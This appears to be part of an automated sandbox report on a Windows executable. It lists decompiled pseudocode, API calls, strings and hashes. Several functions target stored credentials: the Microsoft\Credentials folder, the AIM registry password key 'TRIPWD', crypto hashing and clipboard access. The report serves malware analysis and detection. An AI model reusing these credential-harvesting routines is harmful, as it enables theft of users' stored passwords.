					_t17 = _t13;
				}
				return _t17;
			}

0x00404390
0x0040439a
0x004043a1
0x004043ac
0x004043b2
0x004043b7
0x004043b9
0x004043bd
0x004043c7
0x004043d5
0x004043da
0x004043da
0x004043e1

APIs

memset.MSVCRT ref: 004043A1

Part of subcall function 0041223F: SHGetSpecialFolderPathA.SHELL32(00000000,00000000,0000001A,00000000,00000000,00000104), ref: 00412279

Part of subcall function 0040680E: strlen.MSVCRT ref: 0040680F
Part of subcall function 0040680E: _mbscat.MSVCRT ref: 00406826

Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F00
Part of subcall function 00406EFE: strlen.MSVCRT ref: 00406F0B
Part of subcall function 00406EFE: _mbscat.MSVCRT ref: 00406F22

Part of subcall function 004042AA: _strnicmp.MSVCRT ref: 0040431A

Strings

Microsoft\Credentials, xrefs: 004043C2

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$_mbscat$FolderPathSpecial_strnicmpmemset
String ID: Microsoft\Credentials
API String ID: 3139367858-3148402405
Opcode ID: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
Instruction ID: 677ab761eff5409f3287a779563a9fbc28491fd5395d1aa5cc811df03cb69dee
Opcode Fuzzy Hash: b9bc567b91fdf7fc349dfc15b94f9d4a96cdfacf2bcfcbc0785656f82b29690e
Instruction Fuzzy Hash: 8CF0E97260411427D660B66AEC06FCF775C8F90754F00006AF988F71C1D9F8AA95C3E5

Uniqueness

Uniqueness Score: -1.00%

Function 00411EC1, Relevance: 3.0, APIs: 2, Instructions: 22COMMON

Download Yara Rule

APIs

WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 00411EDB
GetPrivateProfileStringA.KERNEL32(?,?,?,?,?,?), ref: 00411EF0

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfileString$Write
String ID:
API String ID: 2948465352-0
Opcode ID: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
Instruction ID: d9e70508a7a1dcd4d44e453fce3bd4c14a214bdae5f42dce9164bd63fbf12eb7
Opcode Fuzzy Hash: abc632a6b8702d949c7b4aeb5ee99501477ff23bfd6640d1747d5c6edfc6b77e
Instruction Fuzzy Hash: A7E0E53600020DFBCF018FE0DC44EEA3F79EB48344F04C425BA0989021C776C6A6EBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00408490, Relevance: 2.6, APIs: 2, Instructions: 111
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E00408490(intOrPtr _a4, int _a8, wchar_t* _a12) {
				void* _v8;
				char _v12;
				void* _v35;
				int _v36;
				int _v250;
				char _v252;
				void _v291;
				int _v292;
				void* __ebx;
				void* __esi;
				intOrPtr* _t37;
				void* _t38;
				int _t39;
				intOrPtr* _t42;
				void* _t43;
				void* _t44;
				intOrPtr* _t47;
				void* _t48;
				int _t57;
				void* _t64;
				void* _t66;
				intOrPtr _t67;
				intOrPtr _t70;
				int* _t71;
				struct HINSTANCE__** _t74;
				intOrPtr* _t75;
				void* _t76;

				_t74 = _a4 + 0x78;
				E00404D18(_t74);
				_t37 =  *((intOrPtr*)(_t74 + 0xc));
				_t57 = 0;
				if(_t37 == 0) {
					_t38 = 0;
				} else {
					_t38 =  *_t37(_a8, 0x8004, 0, 0,  &_v8); // executed
				}
				if(_t38 != _t57) {
					_t39 = wcslen(_a12);
					_t7 = _t39 + 2; // 0x2
					_t66 = _t39 + _t7;
					_a8 = _v8;
					E00404D18(_t74);
					_t42 =  *((intOrPtr*)(_t74 + 0x14));
					if(_t42 == _t57) {
						_t43 = 0;
					} else {
						_t43 =  *_t42(_a8, _a12, _t66, _t57);
					}
					if(_t43 == _t57) {
						L15:
						_t67 = _v8;
						_t44 = E00404D18(_t74);
						_t75 =  *((intOrPtr*)(_t74 + 0x18));
						if(_t75 != _t57) {
							_t44 =  *_t75(_t67);
						}
						return _t44;
					} else {
						_v36 = _t57;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosd");
						_t70 = _v8;
						_v12 = 0x14;
						E00404D18(_t74);
						_t47 =  *((intOrPtr*)(_t74 + 0x10));
						if(_t47 == _t57) {
							_t48 = 0;
						} else {
							_t48 =  *_t47(_t70, 2,  &_v36,  &_v12, _t57);
						}
						if(_t48 != _t57) {
							_v292 = _t57;
							memset( &_v291, _t57, 0xff);
							_a8 = _t57;
							_t64 = 0;
							_t71 =  &_v292;
							do {
								_a8 = _a8 + ( *(_t76 + _t64 - 0x20) & 0x000000ff);
								E004081DA(_t71,  *(_t76 + _t64 - 0x20) & 0x000000ff);
								_t64 = _t64 + 1;
								_t71 = _t71 + 2;
							} while (_t64 < 0x14);
							E004081DA( &_v252, _a8);
							_v250 = _t57;
							E004083D0(_a4,  &_v292, _a12);
							_t57 = 0;
						}
						goto L15;
					}
				}
				return _t38;
			}

0x0040849e
0x004084a1
0x004084a6
0x004084a9
0x004084ad
0x004084c1
0x004084af
0x004084bd
0x004084bd
0x004084c5
0x004084cf
0x004084d4
0x004084d4
0x004084dc
0x004084df
0x004084e4
0x004084e9
0x004084f7
0x004084eb
0x004084f3
0x004084f3
0x004084fb
0x004085a0
0x004085a0
0x004085a3
0x004085a8
0x004085ad
0x004085b0
0x004085b0
0x00000000
0x00408501
0x00408501
0x00408509
0x0040850a
0x0040850b
0x0040850c
0x0040850d
0x0040850e
0x00408511
0x00408518
0x0040851d
0x00408522
0x00408534
0x00408524
0x00408530
0x00408530
0x00408538
0x00408547
0x0040854d
0x00408555
0x00408558
0x0040855a
0x00408560
0x00408565
0x0040856b
0x00408570
0x00408572
0x00408573
0x00408581
0x0040858f
0x00408599
0x0040859e
0x0040859e
0x00000000
0x00408538
0x004084fb
0x004085b6

APIs

Part of subcall function 00404D18: LoadLibraryA.KERNEL32(advapi32.dll,?,004084A6), ref: 00404D23
Part of subcall function 00404D18: GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 00404D37
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00404D43
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptCreateHash), ref: 00404D4F
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptGetHashParam), ref: 00404D5B
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptHashData), ref: 00404D67
Part of subcall function 00404D18: GetProcAddress.KERNEL32(?,CryptDestroyHash), ref: 00404D73

wcslen.MSVCRT ref: 004084CF
memset.MSVCRT ref: 0040854D

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$LibraryLoadmemsetwcslen
String ID:
API String ID: 1960736289-0
Opcode ID: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
Instruction ID: 2dd004568a6c17cef409d44c463746fb2ce178d2970b6d5fdfdea9e5a7127ffe
Opcode Fuzzy Hash: f78174ecb424998fb22a5f41f112440964ae667a2303fb3ee1b26447fe91a2a4
Instruction Fuzzy Hash: D931A331500159BFCB11DFA4CD819EF77A8AF88304F14447EF985B7181DA38AE599B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040D9B9, Relevance: 2.6, APIs: 2, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040D9B9(intOrPtr* __esi) {
				intOrPtr _v8;
				int _v16;
				int _v20;
				char _v276;
				char _v532;
				void _v1555;
				char _v1556;
				void _v2579;
				char _v2580;
				void* __ebx;
				void* __edi;
				char* _t26;

				_v8 = 1;
				_v1556 = 0;
				memset( &_v1555, 0, 0x3ff);
				_v2580 = 0;
				memset( &_v2579, 0, 0x3ff);
				_t26 =  &_v1556;
				0x413735(_t26,  &_v2580); // executed
				if(_t26 != 0) {
					_v532 = 0;
					_v276 = 0;
					_v20 = 0;
					_v16 = 0;
					E00406958(0xff,  &_v532,  &_v1556);
					E00406958(0xff,  &_v276,  &_v2580);
					_push( &_v532);
					_v16 = 4;
					_v20 = 7;
					_v8 =  *((intOrPtr*)( *__esi))();
				}
				return _v8;
			}

0x0040d9d4
0x0040d9db
0x0040d9e1
0x0040d9f2
0x0040d9f8
0x0040da07
0x0040da0e
0x0040da15
0x0040da1d
0x0040da23
0x0040da29
0x0040da2c
0x0040da3b
0x0040da4e
0x0040da5c
0x0040da5f
0x0040da66
0x0040da6f
0x0040da6f
0x0040da78

APIs

memset.MSVCRT ref: 0040D9E1
memset.MSVCRT ref: 0040D9F8

Part of subcall function 00413735: memset.MSVCRT ref: 00413757
Part of subcall function 00413735: RegCloseKey.ADVAPI32(?,?,?,?,000003FF,?,00000000), ref: 004137BF

Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: memset$Closememcpystrlen
String ID:
API String ID: 1317463181-0
Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65

Uniqueness

Uniqueness Score: -1.00%

Function 0040F9A0, Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON

Download Yara Rule

APIs

Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE

Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00406D4F

CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: strlen$FileTime$CloseCompareHandlememset
String ID:
API String ID: 3621460190-0
Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00411D82, Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON

Download Yara Rule

APIs

RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64

Uniqueness

Uniqueness Score: -1.00%

Function 00411D37, Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E

Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: PrivateProfile$StringWrite_itoamemset
String ID:
API String ID: 4165544737-0
Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84

Uniqueness

Uniqueness Score: -1.00%

Function 00406ED6, Relevance: 1.5, APIs: 1, Instructions: 17
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406ED6(void* __ecx, intOrPtr* __esi, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t9;

				_v8 = _v8 & 0x00000000;
				_t9 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(__esi != 0) {
					 *((intOrPtr*)(__esi)) = _v8;
					return _t9;
				}
				return _t9;
			}

0x00406eda
0x00406eed
0x00406ef5
0x00406efa
0x00000000
0x00406efa
0x00406efd

APIs

ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98

Uniqueness

Uniqueness Score: -1.00%

Function 00407A7A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

??3@YAXPAX@Z.MSVCRT ref: 00407A81

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: ??3@
String ID:
API String ID: 613200358-0
Opcode ID: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
Instruction ID: d064f037d8cc498e3967daff6ff593c2326981cc2c3d102c7782d5cd9755b432
Opcode Fuzzy Hash: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
Instruction Fuzzy Hash: A5C00272A14B018FE7709E55D4057A6B3E4AF1073BF618C1DD4D591581D77CE5848E14

Uniqueness

Uniqueness Score: -1.00%

Function 004067D3, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067D3(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}

0x004067e5
0x004067eb

APIs

CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524

Uniqueness

Uniqueness Score: -1.00%

Function 004067BA, Relevance: 1.5, APIs: 1, Instructions: 10
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004067BA(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				return _t3;
			}

0x004067cc
0x004067d2

APIs

CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524

Uniqueness

Uniqueness Score: -1.00%

Function 00404CE0, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404CE0(signed int* __esi) {
				struct HINSTANCE__* _t3;
				int _t4;

				_t3 =  *__esi;
				__esi[1] = __esi[1] & 0x00000000;
				if(_t3 != 0) {
					_t4 = FreeLibrary(_t3); // executed
					 *__esi =  *__esi & 0x00000000;
					return _t4;
				}
				return _t3;
			}

0x00404ce0
0x00404ce2
0x00404ce8
0x00404ceb
0x00404cf1
0x00000000
0x00404cf1
0x00404cf4

APIs

FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18

Uniqueness

Uniqueness Score: -1.00%

Function 00412111, Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: EnumNamesResource
String ID:
API String ID: 3334572018-0
Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605

Uniqueness

Uniqueness Score: -1.00%

Function 00407930, Relevance: 1.5, APIs: 1, Instructions: 8
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407930(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}

0x00407930
0x00407937
0x0040793a
0x00407940
0x00000000
0x00407940
0x00407943

APIs

FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04

Uniqueness

Uniqueness Score: -1.00%

Function 00411D68, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57

Uniqueness

Uniqueness Score: -1.00%

Function 004069D3, Relevance: 1.5, APIs: 1, Instructions: 7
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004069D3(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}

0x004069d7
0x004069e7

APIs

GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040BA30, Relevance: 9.1, APIs: 6, Instructions: 54
fileclipboardCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040BA30(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, 0x418628, 0,  &_v264);
				_t18 = E0040B9EA(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E004068B5(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00406830(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}

0x0040ba30
0x0040ba3b
0x0040ba4a
0x0040ba50
0x0040ba52
0x0040ba5c
0x0040ba5c
0x0040ba77
0x0040ba7e
0x0040ba8f
0x0040ba96
0x0040ba9e
0x0040baa4
0x0040baa6
0x0040bab7
0x0040baa8
0x0040baaf
0x0040bab4
0x0040babf
0x0040bac7
0x0040bacc
0x00000000
0x0040bad4
0x0040badd

APIs

GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
OpenClipboard.USER32(?), ref: 0040BA9E
GetLastError.KERNEL32 ref: 0040BAB7
DeleteFileA.KERNEL32(00000000), ref: 0040BAD4

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
String ID:
API String ID: 2014771361-0
Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68

Uniqueness

Uniqueness Score: -1.00%

Function 00406B06, Relevance: 1.5, APIs: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406B06() {

				if( *0x41e164 == 0) {
					0x41e160->dwOSVersionInfoSize = 0x94;
					GetVersionExA(0x41e160);
				}
				return 0x41e160;
			}

0x00406b13
0x00406b16
0x00406b20
0x00406b20
0x00406b29

APIs

GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20

Memory Dump Source

Source File: 00000016.00000002.609624686.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.609673498.000000000041B000.00000040.00000001.sdmp Download File

Similarity

API ID: Version
String ID:
API String ID: 1889659487-0
Opcode ID: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
Instruction ID: da77bcce2c8e52e385cf56c8afe7a40ad3a24cfb33d571a5ca18312b8fc7eb0c
Opcode Fuzzy Hash: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
Instruction Fuzzy Hash: 8EC00279911225EBD6205B59BD08BC677A8A74D355F018476A901A2264C3F81C45C799

Uniqueness

Uniqueness Score: -1.00%

Function 00412768, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00412B87
_strncoll.MSVCRT ref: 00412B97
memcpy.MSVCRT ref: 00412C13
atoi.MSVCRT ref: 00412C24
WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50

Strings

atilde;, xrefs: 00412A49
iexcl;, xrefs: 004127B5
Iacute;, xrefs: 0041296D
sup2;, xrefs: 0041285F
uacute;, xrefs: 00412B2D
Ograve;, xrefs: 0041299F
Ugrave;, xrefs: 004129E5
laquo;, xrefs: 00412819
euml;, xrefs: 00412AA6
Acirc;, xrefs: 004128FF
Iuml;, xrefs: 00412981
micro;, xrefs: 0041287D
para;, xrefs: 00412887
ETH;, xrefs: 0041298B
Igrave;, xrefs: 00412963
shy;, xrefs: 0041282D
apos;, xrefs: 00412796
yen;, xrefs: 004127DD
igrave;, xrefs: 00412AB0
Uuml;, xrefs: 00412A03
yuml;, xrefs: 00412B50
Yacute;, xrefs: 00412A0D
cent;, xrefs: 004127BF
agrave;, xrefs: 00412A2B
cedil;, xrefs: 0041289B
Egrave;, xrefs: 0041293B
frac34;, xrefs: 004128D7
Icirc;, xrefs: 00412977
eacute;, xrefs: 00412A92
quot;, xrefs: 00412788
ordm;, xrefs: 004128AF
Ntilde;, xrefs: 00412995
acirc;, xrefs: 00412A3F
icirc;, xrefs: 00412AC4
sect;, xrefs: 004127F1
iquest;, xrefs: 004128E1
otilde;, xrefs: 00412B0A
lt;, xrefs: 0041277A
Atilde;, xrefs: 00412909
deg;, xrefs: 0041284B
Aring;, xrefs: 0041291D
